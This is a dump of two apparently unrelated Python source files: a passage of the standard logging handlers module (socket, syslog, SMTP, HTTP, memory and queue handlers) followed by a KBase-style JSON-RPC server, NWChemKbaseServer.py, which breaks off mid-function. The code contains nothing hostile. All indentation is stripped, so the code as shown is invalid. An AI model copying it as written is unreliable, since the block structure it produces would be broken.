if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + '.' + time.
strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
if (self.when == 'MIDNIGHT' or self.when.startswith('W')
) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow:
addend = -3600
else:
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
try:
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
self.stream.flush()
self.stream.close()
self.stream = None
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = host, port
self.sock = None
self.closeOnError = False
self.retryTime = None
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close()
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
if self.retryTime is None:
attempt = True
else:
attempt = now >= self.retryTime
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None
except OSError:
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
if self.sock:
try:
self.sock.sendall(s)
except OSError:
self.sock.close()
self.sock = None
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
dummy = self.format(record)
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack('>L', len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
LOG_EMERG = 0
LOG_ALERT = 1
LOG_CRIT = 2
LOG_ERR = 3
LOG_WARNING = 4
LOG_NOTICE = 5
LOG_INFO = 6
LOG_DEBUG = 7
LOG_KERN = 0
LOG_USER = 1
LOG_MAIL = 2
LOG_DAEMON = 3
LOG_AUTH = 4
LOG_SYSLOG = 5
LOG_LPR = 6
LOG_NEWS = 7
LOG_UUCP = 8
LOG_CRON = 9
LOG_AUTHPRIV = 10
LOG_FTP = 11
LOG_LOCAL0 = 16
LOG_LOCAL1 = 17
LOG_LOCAL2 = 18
LOG_LOCAL3 = 19
LOG_LOCAL4 = 20
LOG_LOCAL5 = 21
LOG_LOCAL6 = 22
LOG_LOCAL7 = 23
priority_names = {'alert': LOG_ALERT, 'crit': LOG_CRIT, 'critical':
LOG_CRIT, 'debug': LOG_DEBUG, 'emerg': LOG_EMERG, 'err': LOG_ERR,
'error': LOG_ERR, 'info': LOG_INFO, 'notice': LOG_NOTICE, 'panic':
LOG_EMERG, 'warn': LOG_WARNING, 'warning': LOG_WARNING}
facility_names = {'auth': LOG_AUTH, 'authpriv': LOG_AUTHPRIV, 'cron':
LOG_CRON, 'daemon': LOG_DAEMON, 'ftp': LOG_FTP, 'kern': LOG_KERN,
'lpr': LOG_LPR, 'mail': LOG_MAIL, 'news': LOG_NEWS, 'security':
LOG_AUTH, 'syslog': LOG_SYSLOG, 'user': LOG_USER, 'uucp': LOG_UUCP,
'local0': LOG_LOCAL0, 'local1': LOG_LOCAL1, 'local2': LOG_LOCAL2,
'local3': LOG_LOCAL3, 'local4': LOG_LOCAL4, 'local5': LOG_LOCAL5,
'local6': LOG_LOCAL6, 'local7': LOG_LOCAL7}
priority_map = {'DEBUG': 'debug', 'INFO': 'info', 'WARNING': 'warning',
'ERROR': 'error', 'CRITICAL': 'critical'}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT), facility=
LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError('getaddrinfo returns an empty list')
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return facility << 3 | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, 'warning')
ident = ''
append_nul = True
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\x00'
prio = '<%d>' % self.encodePriority(self.facility, self.
mapPriority(record.levelname))
prio = prio.encode('utf-8')
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject, credentials=
None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype='Application'):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], 'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {logging.DEBUG: win32evtlog.
EVENTLOG_INFORMATION_TYPE, logging.INFO: win32evtlog.
EVENTLOG_INFORMATION_TYPE, logging.WARNING: win32evtlog.
EVENTLOG_WARNING_TYPE, logging.ERROR: win32evtlog.
EVENTLOG_ERROR_TYPE, logging.CRITICAL: win32evtlog.
EVENTLOG_ERROR_TYPE}
except ImportError:
print(
'The Python Win32 extensions for NT (service, event logging) appear not to be available.'
)
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method='GET', secure=False, credentials=
None, context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ['GET', 'POST']:
raise ValueError('method must be GET or POST')
if not secure and context is not None:
raise ValueError(
'context parameter only makes sense with secure=True')
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == 'GET':
if url.find('?') >= 0:
sep = '&'
else:
sep = '?'
url = url + '%c%s' % (sep, data)
h.putrequest(self.method, url)
i = host.find(':')
if i >= 0:
host = host[:i]
h.putheader('Host', host)
if self.method == 'POST':
h.putheader('Content-type', 'application/x-www-form-urlencoded'
)
h.putheader('Content-length', str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == 'POST':
h.send(data.encode('utf-8'))
h.getresponse()
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return len(self.buffer) >= self.capacity
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return len(self.buffer
) >= self.capacity or record.levelno >= self.flushLevel
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
NWChemKbaseServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from NWChemKbase.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'NWChemKbase'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from NWChemKbase.NWChemKbaseImpl import NWChemKbase # noqa @IgnorePep8
impl_NWChemKbase = NWChemKbase(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'NWChemKbase'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_NWChemKbase.run_NWChemKbase,
name='NWChemKbase.run_NWChemKbase',
types=[dict])
self.method_authentication['NWChemKbase.run_NWChemKbase'] = 'required' # noqa
self.rpc_service.add(impl_NWChemKbase.status,
name='NWChemKbase.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
